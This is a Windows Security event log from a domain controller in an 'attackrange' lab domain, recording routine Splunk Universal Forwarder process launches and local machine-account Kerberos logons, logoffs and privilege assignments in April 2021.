Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
04/19/2021 04:04:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265218
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xaac
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:04:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265220
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1964
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:04:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265219
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x760
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:04:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265221
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15f8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:04:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265222
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D5AAE
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 04:04:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265225
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D875D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 04:04:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265224
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8D875D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 65089
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 04:04:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265223
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D875D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 04:05:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265226
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14d0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:05:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265228
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:05:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265227
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1084
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:05:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265229
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1820
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:05:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265231
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1138
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:05:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265230
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1920
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:05:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265232
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x12dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:05:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265235
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8DBFD3
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 04:05:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265234
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8DBFD3
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 65102
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 04:05:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265233
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8DBFD3
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 04:06:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265236
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x650
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:06:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265238
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1440
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:06:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265237
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1734
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:06:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265239
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13a0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.